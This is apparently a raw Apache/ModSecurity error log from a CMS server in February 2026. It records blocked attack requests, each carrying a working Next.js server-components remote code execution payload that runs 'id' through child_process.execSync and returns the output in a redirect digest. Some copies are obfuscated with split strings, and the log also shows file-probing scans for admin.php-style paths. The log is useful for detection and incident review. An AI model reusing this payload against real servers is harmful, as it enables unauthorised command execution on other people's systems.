{\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _wmuu=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xove=Buffer.from(_wmuu).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xove};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZOoi1EzrCvApMtoJCX1VQAAARU"] [Tue Feb 17 01:30:19.762750 2026] [:error] [pid 20915:tid 20939] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _cvcz=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _zngr=Buffer.from(_cvcz).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_zngr};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZOoi1EzrCvApMtoJCX1VwAAAQ0"] [Tue Feb 17 01:30:19.778761 2026] [:error] [pid 20915:tid 20929] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _upzg=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _vyqi=Buffer.from(_upzg).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_vyqi};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZOoi1EzrCvApMtoJCX1WAAAAQM"] [Thu Feb 19 13:15:43.757286 2026] [:error] [pid 26958:tid 26970] [client 74.7.243.247:50616] [client 74.7.243.247] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aZbw3y8hZb-DNugTYXumUwAAAMo"], referer: https://www.cms-1.dev-unit.com/event/Joy-&-Connection---with-Chude-Jideonwo [Thu Feb 19 22:52:38.616348 2026] [:error] [pid 16295:tid 16327] [client 4.206.20.144:30685] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Thu Feb 19 22:52:56.513066 2026] [:error] [pid 16295:tid 16329] [client 4.206.20.144:30685] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/bak.php [Thu Feb 19 22:53:03.493426 2026] [:error] [pid 16295:tid 16318] [client 4.206.20.144:30685] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/min.php [Thu Feb 19 22:53:06.503776 2026] [:error] [pid 16295:tid 16334] [client 4.206.20.144:30685] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/aboud.php [Sat Feb 21 21:10:03.582897 2026] [:error] [pid 12371:tid 12383] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _lcye=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _mzpv=Buffer.from(_lcye).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_mzpv};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZoDC_XFy7BeiaQMHVgogQAAAAo"] [Sat Feb 21 21:10:03.591389 2026] [:error] [pid 12371:tid 12394] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _objh=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _vsdy=Buffer.from(_objh).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_vsdy};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZoDC_XFy7BeiaQMHVgoggAAABU"] [Sat Feb 21 21:10:03.600093 2026] [:error] [pid 12371:tid 12385] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _inan=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _piyn=Buffer.from(_inan).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_piyn};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZoDC_XFy7BeiaQMHVgogwAAAAw"] [Sat Feb 21 21:10:03.609340 2026] [:error] [pid 12371:tid 12376] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zvqt=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _lxvm=Buffer.from(_zvqt).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_lxvm};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZoDC_XFy7BeiaQMHVgohAAAAAM"] [Sat Feb 21 21:10:03.618238 2026] [:error] [pid 12371:tid 12375] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _itxh=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _gxmh=Buffer.from(_itxh).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_gxmh};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZoDC_XFy7BeiaQMHVgohQAAAAI"] [Sat Feb 21 21:10:03.626454 2026] [:error] [pid 12371:tid 12391] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _kikz=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _dakm=Buffer.from(_kikz).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_dakm};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZoDC_XFy7BeiaQMHVgohgAAABI"] [Sat Feb 21 21:10:03.635774 2026] [:error] [pid 12371:tid 12373] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ufgm=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _mjqv=Buffer.from(_ufgm).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_mjqv};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZoDC_XFy7BeiaQMHVgohwAAAAA"] [Sat Feb 21 21:10:03.645148 2026] [:error] [pid 12371:tid 12387] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _tolz=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _ckme=Buffer.from(_tolz).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ckme};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZoDC_XFy7BeiaQMHVgoiAAAAA4"] [Sat Feb 21 21:10:03.653953 2026] [:error] [pid 12371:tid 12377] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _okhw=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ovtd=Buffer.from(_okhw).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ovtd};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZoDC_XFy7BeiaQMHVgoiQAAAAQ"] [Sat Feb 21 21:10:03.664314 2026] [:error] [pid 12371:tid 12379] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _buyd=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _qeeb=Buffer.from(_buyd).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_qeeb};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZoDC_XFy7BeiaQMHVgoigAAAAY"] [Sat Feb 21 21:10:03.672586 2026] [:error] [pid 12371:tid 12390] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zyvy=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _wgpg=Buffer.from(_zyvy).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_wgpg};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZoDC_XFy7BeiaQMHVgoiwAAABE"] [Sat Feb 21 21:10:03.680325 2026] [:error] [pid 12371:tid 12393] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _xkbv=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _qcqu=Buffer.from(_xkbv).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_qcqu};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZoDC_XFy7BeiaQMHVgojAAAABQ"] [Sat Feb 21 21:10:03.689259 2026] [:error] [pid 12371:tid 12386] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ivri=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _hcpz=Buffer.from(_ivri).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_hcpz};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZoDC_XFy7BeiaQMHVgojQAAAA0"] [Sat Feb 21 21:10:03.698295 2026] [:error] [pid 12371:tid 12388] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _vyur=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _dwyq=Buffer.from(_vyur).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_dwyq};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZoDC_XFy7BeiaQMHVgojgAAAA8"] [Sat Feb 21 21:10:03.706511 2026] [:error] [pid 12371:tid 12384] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _cyjs=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _nmqv=Buffer.from(_cyjs).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_nmqv};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZoDC_XFy7BeiaQMHVgojwAAAAs"] [Sat Feb 21 21:10:03.715501 2026] [:error] [pid 12371:tid 12397] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _dftz=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _rmkg=Buffer.from(_dftz).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_rmkg};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZoDC_XFy7BeiaQMHVgokAAAABg"] [Sat Feb 21 21:10:03.723811 